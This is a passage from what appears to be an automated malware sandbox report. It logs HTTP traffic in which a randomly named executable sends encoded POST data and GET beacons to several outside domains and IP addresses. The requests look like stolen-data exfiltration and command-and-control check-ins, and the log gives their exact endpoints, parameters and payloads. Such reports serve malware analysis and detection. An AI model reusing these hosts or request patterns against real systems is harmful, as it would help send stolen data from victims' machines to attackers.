                                                          User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                          Data Raw: 48 30 6b 78 49 56 63 3d 54 4c 4f 68 41 43 33 45 6a 4a 4e 50 43 69 53 66 48 6f 75 39 65 77 73 37 66 68 53 61 61 50 61 57 73 42 66 56 47 59 6d 4b 2b 41 44 77 36 4c 69 6a 70 47 7a 64 78 70 58 61 72 76 54 55 4c 51 4f 52 2b 34 48 6f 2b 4d 73 48 35 78 35 75 38 52 79 79 64 35 51 71 6c 49 57 38 59 72 4f 46 41 36 58 4f 37 38 6b 39 58 64 6e 6e 63 62 43 65 4c 63 76 52 2b 6e 74 6f 64 41 51 62 4c 53 54 68 68 38 64 6d 65 79 56 4d 36 75 37 48 49 45 77 73 58 2b 65 51 51 6c 66 6f 62 31 66 72 69 63 79 64 4e 53 32 4e 46 59 71 57 31 6a 67 59 76 75 37 61 69 31 68 52 41 57 42 6f 6e 79 59 79 6d 6f 4a 61 74 74 6f 75 35 41 3d 3d
                                                          Data Ascii: H0kxIVc=TLOhAC3EjJNPCiSfHou9ews7fhSaaPaWsBfVGYmK+ADw6LijpGzdxpXarvTULQOR+4Ho+MsH5x5u8Ryyd5QqlIW8YrOFA6XO78k9XdnncbCeLcvR+ntodAQbLSThh8dmeyVM6u7HIEwsX+eQQlfob1fricydNS2NFYqW1jgYvu7ai1hRAWBonyYymoJattou5A==


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          10192.168.2.4498703.33.130.190802816C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 5, 2024 15:43:11.007330894 CET747OUTPOST /4oy8/ HTTP/1.1
                                                          Host: www.ninesquare.games
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Origin: http://www.ninesquare.games
                                                          Referer: http://www.ninesquare.games/4oy8/
                                                          Cache-Control: max-age=0
                                                          Content-Length: 224
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                          Data Raw: 48 30 6b 78 49 56 63 3d 54 4c 4f 68 41 43 33 45 6a 4a 4e 50 44 42 4b 66 43 49 53 39 50 41 73 34 54 42 53 61 55 76 61 53 73 42 54 56 47 61 4b 61 2f 31 62 77 39 70 4b 6a 71 48 7a 64 38 4a 58 61 6a 50 53 63 45 77 4f 67 2b 35 37 65 2b 4d 67 48 35 78 64 75 38 55 65 79 64 75 6b 72 6e 59 57 79 65 72 4f 48 59 61 58 4f 37 38 6b 39 58 63 58 42 63 66 75 65 4b 70 6e 52 2f 44 78 72 44 51 51 45 4f 53 54 68 6c 38 64 69 65 79 55 62 36 71 37 39 49 41 41 73 58 2f 75 51 51 77 7a 33 51 31 66 58 76 38 79 4a 4a 7a 50 2b 45 71 50 31 71 51 38 4a 75 4f 4b 38 71 54 77 4c 52 6e 67 2f 31 79 38 42 37 76 41 75 67 75 56 6e 69 41 61 56 4d 6a 45 58 54 4c 30 30 73 67 53 56 2f 70 65 47 39 70 6f 3d
                                                          Data Ascii: H0kxIVc=TLOhAC3EjJNPDBKfCIS9PAs4TBSaUvaSsBTVGaKa/1bw9pKjqHzd8JXajPScEwOg+57e+MgH5xdu8UeydukrnYWyerOHYaXO78k9XcXBcfueKpnR/DxrDQQEOSThl8dieyUb6q79IAAsX/uQQwz3Q1fXv8yJJzP+EqP1qQ8JuOK8qTwLRng/1y8B7vAuguVniAaVMjEXTL00sgSV/peG9po=


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          11192.168.2.4498843.33.130.190802816C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 5, 2024 15:43:13.548871040 CET10829OUTPOST /4oy8/ HTTP/1.1
                                                          Host: www.ninesquare.games
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Origin: http://www.ninesquare.games
                                                          Referer: http://www.ninesquare.games/4oy8/
                                                          Cache-Control: max-age=0
                                                          Content-Length: 10304
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                          Data Raw: 48 30 6b 78 49 56 63 3d 54 4c 4f 68 41 43 33 45 6a 4a 4e 50 44 42 4b 66 43 49 53 39 50 41 73 34 54 42 53 61 55 76 61 53 73 42 54 56 47 61 4b 61 2f 32 37 77 36 59 71 6a 6f 67 6e 64 39 4a 58 61 70 76 53 66 45 77 4f 35 2b 35 69 58 2b 4d 63 35 35 7a 56 75 6d 32 57 79 4a 4d 4d 72 75 59 57 79 54 4c 4f 45 41 36 58 62 37 2f 63 35 58 63 6e 42 63 66 75 65 4b 6f 58 52 34 58 74 72 42 51 51 62 4c 53 54 74 68 38 63 46 65 79 4d 4c 36 71 2f 74 49 52 38 73 5a 2f 2b 51 53 47 48 33 4d 6c 66 76 68 63 7a 4f 4a 79 7a 68 45 71 54 44 71 54 67 6a 75 4e 57 38 76 43 55 55 49 56 73 66 75 67 38 6c 6e 50 49 32 76 5a 6c 4c 6e 7a 4f 75 4b 78 6f 41 48 49 6b 73 6b 41 72 6e 36 59 53 56 69 50 49 61 37 64 4e 51 43 6e 4d 70 6d 30 6a 70 6d 4e 54 70 41 61 4c 78 2b 67 68 71 39 49 4b 6b 62 35 54 48 70 4b 2b 35 45 42 71 46 48 75 63 37 56 33 38 43 62 65 36 50 2b 52 38 61 47 6d 74 75 35 45 30 48 4b 57 77 6d 4e 69 31 74 2f 75 30 57 59 39 6c 4f 53 68 68 6f 6c 6c 31 65 6e 76 55 33 34 61 57 41 30 6b 6a 73 70 39 54 76 70 42 44 4c 67 79 39 6d 69 33 [TRUNCATED]
                                                          Data Ascii: H0kxIVc=TLOhAC3EjJNPDBKfCIS9PAs4TBSaUvaSsBTVGaKa/27w6Yqjognd9JXapvSfEwO5+5iX+Mc55zVum2WyJMMruYWyTLOEA6Xb7/c5XcnBcfueKoXR4XtrBQQbLSTth8cFeyML6q/tIR8sZ/+QSGH3MlfvhczOJyzhEqTDqTgjuNW8vCUUIVsfug8lnPI2vZlLnzOuKxoAHIkskArn6YSViPIa7dNQCnMpm0jpmNTpAaLx+ghq9IKkb5THpK+5EBqFHuc7V38Cbe6P+R8aGmtu5E0HKWwmNi1t/u0WY9lOShholl1envU34aWA0kjsp9TvpBDLgy9mi30VTMhfztwb2vmiZsjLyJtVgGp0Czv/EJ3LUzSQyQcNRRXhJ3H93D7uN6tKmP12V8+xbUxe2fYNtyQNyWrtppiY/a5HKg54sxGCa3weV3vCDbF1jgUyEhVy47xxh43G3FnJK2IqHDJOqr4NWPe6oA/cjIUlcR/G3kMn+IA/wMtb0IjNYpAZDV0FQjgOSozX69+YS/l08TijACRRzQyCP19aEtKNidJcys5w1rNOj0DLnLyvS+YYaWYgOD+BLDvutwu4/hwq5k2+OZNlD+WGwEuvEC7Zak70SFOPemaIlRWcdG1D2rhownPhZBmNaD81LRiOiX6zY8zkUV0nrRZd1JxHBSxsEoxoPmrf0itn1xfpsogu91jWo0fws7zeb0SxKtdxVcsj2Api4o8sn608XsDViucOv15qqeEod07GHkMKN8JyGk7XPIkhYwY/yRtwNqWNcQ2r9CymFEV32ee0KEmYpWsoeUWSqzm7Gc7pkrOULkHvzW2o0PmIG+xcR67NMhbifAcVQzhwaIBNMIi4Uo60nSiy3EDPqEk8rotgTbbbmuun97JQVALQrtJmN0OTUfb72xrQsGxDPVk4tqGOlvKA5eykQR29hX4N2YtF8iEhHjwZcF7tkWDBi+V/tZtGvf9JFIX3jOwvhkhNPLgRfYhkuTzFUg2nGLR2 [TRUNCATED]


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          12192.168.2.4499003.33.130.190802816C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 5, 2024 15:43:16.095500946 CET451OUTGET /4oy8/?H0kxIVc=eJmBD13k64JHFxSWOYO7bSQNXUvra9CcpSnvMZyv8GXgjYS7iGOJ4r3qlOLMHwm47b7Urtwu+Ud8lkmMYJJLw7a1N+npSrnw+8NLQJnsUuGONqGxi2BbLT4=&Ot=J0UP4Hshc HTTP/1.1
                                                          Host: www.ninesquare.games
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                          Nov 5, 2024 15:43:31.944534063 CET396INHTTP/1.1 200 OK
                                                          Server: openresty
                                                          Date: Tue, 05 Nov 2024 14:43:31 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 256
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 48 30 6b 78 49 56 63 3d 65 4a 6d 42 44 31 33 6b 36 34 4a 48 46 78 53 57 4f 59 4f 37 62 53 51 4e 58 55 76 72 61 39 43 63 70 53 6e 76 4d 5a 79 76 38 47 58 67 6a 59 53 37 69 47 4f 4a 34 72 33 71 6c 4f 4c 4d 48 77 6d 34 37 62 37 55 72 74 77 75 2b 55 64 38 6c 6b 6d 4d 59 4a 4a 4c 77 37 61 31 4e 2b 6e 70 53 72 6e 77 2b 38 4e 4c 51 4a 6e 73 55 75 47 4f 4e 71 47 78 69 32 42 62 4c 54 34 3d 26 4f 74 3d 4a 30 55 50 34 48 73 68 63 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?H0kxIVc=eJmBD13k64JHFxSWOYO7bSQNXUvra9CcpSnvMZyv8GXgjYS7iGOJ4r3qlOLMHwm47b7Urtwu+Ud8lkmMYJJLw7a1N+npSrnw+8NLQJnsUuGONqGxi2BbLT4=&Ot=J0UP4Hshc"}</script></head></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          13192.168.2.4500163.33.130.190802816C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 5, 2024 15:43:36.988797903 CET709OUTPOST /bawd/ HTTP/1.1
                                                          Host: www.s9gzg9.vip
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Origin: http://www.s9gzg9.vip
                                                          Referer: http://www.s9gzg9.vip/bawd/
                                                          Cache-Control: max-age=0
                                                          Content-Length: 204
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                          Data Raw: 48 30 6b 78 49 56 63 3d 6a 37 39 49 77 4d 42 65 6f 59 47 6a 39 6f 79 6d 57 6c 35 64 39 48 53 41 71 65 5a 63 62 68 76 62 61 58 65 42 68 6b 44 31 59 64 56 2f 56 6f 46 5a 72 67 78 36 6c 35 45 31 66 63 38 7a 44 74 45 6b 73 2f 78 54 74 44 57 54 75 7a 5a 31 2f 4e 57 6b 73 6d 4d 6e 4b 50 4b 75 62 68 2b 66 6e 38 45 75 50 38 76 34 43 61 31 73 66 66 45 46 68 56 6f 76 32 42 36 6c 4d 66 43 64 68 4d 64 4a 48 67 4f 67 61 56 5a 55 5a 74 64 38 59 51 61 4d 38 56 4f 64 48 58 33 33 6a 48 46 7a 6c 6e 69 66 30 53 51 32 57 43 48 58 63 61 4d 62 47 79 35 7a 62 76 45 31 6d 78 6c 32 43 50 74 2b 62 79 70 37 47 7a 6c 55 30 41 3d 3d
                                                          Data Ascii: H0kxIVc=j79IwMBeoYGj9oymWl5d9HSAqeZcbhvbaXeBhkD1YdV/VoFZrgx6l5E1fc8zDtEks/xTtDWTuzZ1/NWksmMnKPKubh+fn8EuP8v4Ca1sffEFhVov2B6lMfCdhMdJHgOgaVZUZtd8YQaM8VOdHX33jHFzlnif0SQ2WCHXcaMbGy5zbvE1mxl2CPt+byp7GzlU0A==


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          14192.168.2.4500173.33.130.190802816C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 5, 2024 15:43:39.537712097 CET729OUTPOST /bawd/ HTTP/1.1
                                                          Host: www.s9gzg9.vip
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Origin: http://www.s9gzg9.vip
                                                          Referer: http://www.s9gzg9.vip/bawd/
                                                          Cache-Control: max-age=0
                                                          Content-Length: 224
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                          Data Raw: 48 30 6b 78 49 56 63 3d 6a 37 39 49 77 4d 42 65 6f 59 47 6a 38 49 43 6d 51 30 35 64 71 33 53 48 76 65 5a 63 51 42 76 58 61 58 69 42 68 6b 71 77 59 4c 4e 2f 55 4b 64 5a 71 68 78 36 6f 5a 45 31 51 38 38 71 62 4e 45 52 73 2f 39 74 74 44 36 54 75 33 78 31 2f 4d 6d 6b 73 56 55 67 62 50 4b 37 43 52 2b 64 71 63 45 75 50 38 76 34 43 61 51 4a 66 66 4d 46 68 6b 59 76 33 67 36 36 50 66 44 76 33 38 64 4a 44 67 4f 6b 61 56 5a 6d 5a 75 5a 47 59 53 53 4d 38 51 4b 64 47 47 33 6f 71 48 46 78 36 58 69 4b 6c 44 73 2b 58 48 4b 39 53 63 51 48 46 77 39 31 61 70 56 76 33 41 45 68 51 50 4a 4e 47 31 67 50 4c 77 59 64 76 46 4c 33 73 46 75 35 51 62 64 37 6b 61 31 50 32 4b 54 59 58 62 45 3d
                                                          Data Ascii: H0kxIVc=j79IwMBeoYGj8ICmQ05dq3SHveZcQBvXaXiBhkqwYLN/UKdZqhx6oZE1Q88qbNERs/9ttD6Tu3x1/MmksVUgbPK7CR+dqcEuP8v4CaQJffMFhkYv3g66PfDv38dJDgOkaVZmZuZGYSSM8QKdGG3oqHFx6XiKlDs+XHK9ScQHFw91apVv3AEhQPJNG1gPLwYdvFL3sFu5Qbd7ka1P2KTYXbE=


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          15192.168.2.4500183.33.130.190802816C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 5, 2024 15:43:42.081111908 CET10811OUTPOST /bawd/ HTTP/1.1
                                                          Host: www.s9gzg9.vip
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Origin: http://www.s9gzg9.vip
                                                          Referer: http://www.s9gzg9.vip/bawd/
                                                          Cache-Control: max-age=0
                                                          Content-Length: 10304
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                          Data Raw: 48 30 6b 78 49 56 63 3d 6a 37 39 49 77 4d 42 65 6f 59 47 6a 38 49 43 6d 51 30 35 64 71 33 53 48 76 65 5a 63 51 42 76 58 61 58 69 42 68 6b 71 77 59 4c 31 2f 55 37 39 5a 71 43 5a 36 6e 35 45 31 4f 73 38 33 62 4e 45 4d 73 2f 31 78 74 44 47 6c 75 78 31 31 77 4b 53 6b 71 67 34 67 43 66 4b 37 66 68 2b 63 6e 38 45 33 50 38 2f 38 43 61 41 4a 66 66 4d 46 68 6e 77 76 79 42 36 36 41 2f 43 64 68 4d 64 2f 48 67 50 44 61 55 77 52 5a 74 30 35 59 68 71 4d 39 77 36 64 4c 51 4c 6f 32 58 46 2f 35 58 6a 50 6c 44 68 67 58 48 2b 62 53 63 4d 39 46 79 68 31 62 66 67 37 6f 41 77 34 4c 2f 46 71 47 6c 6f 4e 49 54 45 52 6e 30 62 51 36 57 36 41 48 5a 30 56 67 61 31 42 6c 61 7a 70 49 66 68 65 53 6c 6e 72 54 51 7a 55 31 42 41 74 50 58 35 58 51 47 77 33 66 54 64 67 4c 44 4b 6c 56 4f 48 78 34 59 50 49 4d 57 62 44 61 51 5a 67 63 30 50 51 6b 51 48 33 4a 6b 73 74 2b 4d 4e 52 59 5a 59 74 72 32 6c 2f 58 44 39 73 6d 48 74 71 41 4b 38 35 7a 70 4f 39 58 38 6f 43 46 36 71 33 54 5a 38 55 51 7a 4b 54 6d 44 74 47 6c 41 4d 62 49 6a 51 55 35 77 [TRUNCATED]
                                                          Data Ascii: H0kxIVc=j79IwMBeoYGj8ICmQ05dq3SHveZcQBvXaXiBhkqwYL1/U79ZqCZ6n5E1Os83bNEMs/1xtDGlux11wKSkqg4gCfK7fh+cn8E3P8/8CaAJffMFhnwvyB66A/CdhMd/HgPDaUwRZt05YhqM9w6dLQLo2XF/5XjPlDhgXH+bScM9Fyh1bfg7oAw4L/FqGloNITERn0bQ6W6AHZ0Vga1BlazpIfheSlnrTQzU1BAtPX5XQGw3fTdgLDKlVOHx4YPIMWbDaQZgc0PQkQH3Jkst+MNRYZYtr2l/XD9smHtqAK85zpO9X8oCF6q3TZ8UQzKTmDtGlAMbIjQU5wUcQxhid80K+Vwtb8Dqv0lHPkK2S1G8dWFU3U904T/pJ32AnhE0RSmiGLSQJ88HWHvc6osLXDK5PBEqBe60rLp88303h25pOofsfpYiKkF57QuJQaorgj+C9tooZRgh463/cnYwp5X7KQ9EFs2jeLvVsQb9ATkSWj3j9JzcvxZPuyHbT4VUmDtSLhPjhN/Za+ur3GATt6VNU4QZlcVPx9kEysqI7F1VawDD2h8EeiUpWfZ/BZPTglT389fn+s7YcBkeuQwaQnAG/3yhm9Z9a29+MeFrYMTbjFr2jqHpoi6SgD8cVPJHsCeYW5bBpWlqbfXIZkUWcCg8kYMRTSm+DNnpyV0PcTRyU8DrgKSBGVS9RJ2TCOSZPu2qb2b17aH6okyeXIdUhby9cUZ+Dc+QYiQqYwSiHXwzeqll7i5RqnLrYPiooeQhy0Ywlj6au6JjS2AH2KF+UODs82ChK+op6ULRdDEFscwC/s0rBMVh6RDLLe3Bat/OkbDXvrZCTxApeFhhe9SnJa3ugSeXQ95IerqAbLx38cGG1JD4g0o9Jn1NWKcqQVjWta9uZpkp5uUbUQfvSnwtmg9qWmKfSLYgFwfEAZZDo6aYYLLP6SxkwJmTd82YzhH5WJOdqMoC0LFtqyhkVFnHd6XyvbzAa0HOumEa76xszHba8lID [TRUNCATED]


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          16192.168.2.4500193.33.130.190802816C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 5, 2024 15:43:44.625415087 CET445OUTGET /bawd/?Ot=J0UP4Hshc&H0kxIVc=u5Voz89uvsTT2ra5JGRdo2CoktUkYzD5T2fkk0TxGbdhObJgjC1dgKFtYssbe+sKkN5ypiW+hntvof+b3woUZtrmCzyplN8wJfaiWaIfZPgKl3YVjiCvOuw= HTTP/1.1
                                                          Host: www.s9gzg9.vip
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                          Nov 5, 2024 15:43:45.253613949 CET396INHTTP/1.1 200 OK
                                                          Server: openresty
                                                          Date: Tue, 05 Nov 2024 14:43:45 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 256
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 4f 74 3d 4a 30 55 50 34 48 73 68 63 26 48 30 6b 78 49 56 63 3d 75 35 56 6f 7a 38 39 75 76 73 54 54 32 72 61 35 4a 47 52 64 6f 32 43 6f 6b 74 55 6b 59 7a 44 35 54 32 66 6b 6b 30 54 78 47 62 64 68 4f 62 4a 67 6a 43 31 64 67 4b 46 74 59 73 73 62 65 2b 73 4b 6b 4e 35 79 70 69 57 2b 68 6e 74 76 6f 66 2b 62 33 77 6f 55 5a 74 72 6d 43 7a 79 70 6c 4e 38 77 4a 66 61 69 57 61 49 66 5a 50 67 4b 6c 33 59 56 6a 69 43 76 4f 75 77 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Ot=J0UP4Hshc&H0kxIVc=u5Voz89uvsTT2ra5JGRdo2CoktUkYzD5T2fkk0TxGbdhObJgjC1dgKFtYssbe+sKkN5ypiW+hntvof+b3woUZtrmCzyplN8wJfaiWaIfZPgKl3YVjiCvOuw="}</script></head></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          17192.168.2.450020161.97.142.144802816C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 5, 2024 15:43:50.337434053 CET718OUTPOST /l9k5/ HTTP/1.1
                                                          Host: www.030002832.xyz
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Origin: http://www.030002832.xyz
                                                          Referer: http://www.030002832.xyz/l9k5/
                                                          Cache-Control: max-age=0
                                                          Content-Length: 204
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                          Data Raw: 48 30 6b 78 49 56 63 3d 4b 35 30 77 6c 35 42 50 64 35 4b 36 4a 41 4d 49 62 47 4f 42 69 63 6e 71 79 79 56 4e 68 77 6b 44 67 2b 50 51 54 67 65 45 59 62 49 4b 4e 56 70 55 35 68 70 78 37 68 4a 4f 34 36 4f 44 45 53 67 37 49 4b 58 35 74 6b 2b 72 70 32 77 31 6c 45 70 56 4b 36 6a 38 35 55 38 78 52 68 6b 2f 78 70 4b 67 57 6c 77 64 6a 69 37 78 2b 6b 74 66 62 67 63 42 61 39 43 72 6b 48 2f 4f 32 7a 48 78 6f 37 73 56 6c 64 59 41 36 79 4f 2b 56 2f 45 67 4b 65 76 48 47 37 6a 62 74 41 67 68 6c 44 68 39 6c 6e 6e 56 6f 57 6e 56 42 53 62 78 64 7a 69 2f 7a 52 59 51 78 49 4e 7a 47 46 6d 72 2b 79 73 4f 64 4e 58 44 6f 67 3d 3d
                                                          Data Ascii: H0kxIVc=K50wl5BPd5K6JAMIbGOBicnqyyVNhwkDg+PQTgeEYbIKNVpU5hpx7hJO46ODESg7IKX5tk+rp2w1lEpVK6j85U8xRhk/xpKgWlwdji7x+ktfbgcBa9CrkH/O2zHxo7sVldYA6yO+V/EgKevHG7jbtAghlDh9lnnVoWnVBSbxdzi/zRYQxINzGFmr+ysOdNXDog==
                                                          Nov 5, 2024 15:43:51.189727068 CET1236INHTTP/1.1 404 Not Found
                                                          Server: nginx
                                                          Date: Tue, 05 Nov 2024 14:43:51 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          ETag: W/"66cce1df-b96"
                                                          Content-Encoding: gzip
                                                          Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                          Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                                                          Nov 5, 2024 15:43:51.189743042 CET370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                          Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          18192.168.2.450021161.97.142.144802816C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 5, 2024 15:43:52.877991915 CET738OUTPOST /l9k5/ HTTP/1.1
                                                          Host: www.030002832.xyz
